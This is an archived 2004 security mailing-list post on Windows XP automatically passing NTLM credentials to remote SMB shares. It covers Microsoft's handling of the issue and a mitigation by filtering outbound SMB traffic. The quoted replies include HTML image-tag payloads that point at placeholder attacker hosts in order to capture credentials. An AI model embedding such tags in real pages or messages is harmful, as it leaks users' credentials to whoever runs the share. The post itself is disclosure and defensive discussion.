lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <2310581523.20040929105242@SECURITY.NNOV.RU> From: 3APA3A at SECURITY.NNOV.RU (3APA3A) Subject: Automatically passing NTLM authentication credentials on Windows XP Dear Hidenobu Seki, HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all I have same question. I had discussion on this topic with Microsoft security team again just few weeks ago (and 2 more discussions during last 4 years). They accepted this problem and have re-opened the case (MSRC 5468lw) but gave no timelines for solution. I think MS doesn't understand problem completely. For example, they still believe SMB signing prevents NTLM relaying attacks while SMB signing doesn't prevent even simplest port redirection, because IP address is not signed. Currently there is no way to mitigate this problem except filtering outgoing NetBIOS and CIFS requests by implementing domain wide IP Security policy to allow SMB and CIFS communication only with file servers/domain controllers (if somebody is interested I can publish step-by-step instructions, but I believe MS should publish KB article to describe this configuration). I don't think problem reported by you is different issue, it's just another exploit scenario for the same problem. I know few more tricks to redirect user to UNC share. --Wednesday, September 29, 2004, 5:43:15 AM, you wrote to 3APA3A@...URITY.NNOV.RU: >>From: 3APA3A <3APA3A@...URITY.NNOV.RU> >> >>This problem is known since at least 1997 and still can be exploited >>with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word >>document. HS> It is not true. HS> They are different problems that happen the same phenomenon. HS> Mr. Cesar Cerrudo taught me that <img HS> src=file://\\www.xxx.yyy\test> still HS> works. HS> Tell me why Microsoft issued patches for MS00-067(KB272743) and HS> MS01-001(KB282132) but not for "img src". > 3APA3A or all HS> Kind regards, HS> Urity HS> _________________________________________________________________ HS> STOP MORE SPAM with the new MSN 8 and get 2 months FREE* HS> http://join.msn.com/?page=features/junkmail -- ~/ZARAZA ???????? ????? ??? ???????????? ?????? - ???????. ?? ????? ???????, ?????? ???????????. (???)
Powered by blists - more mailing lists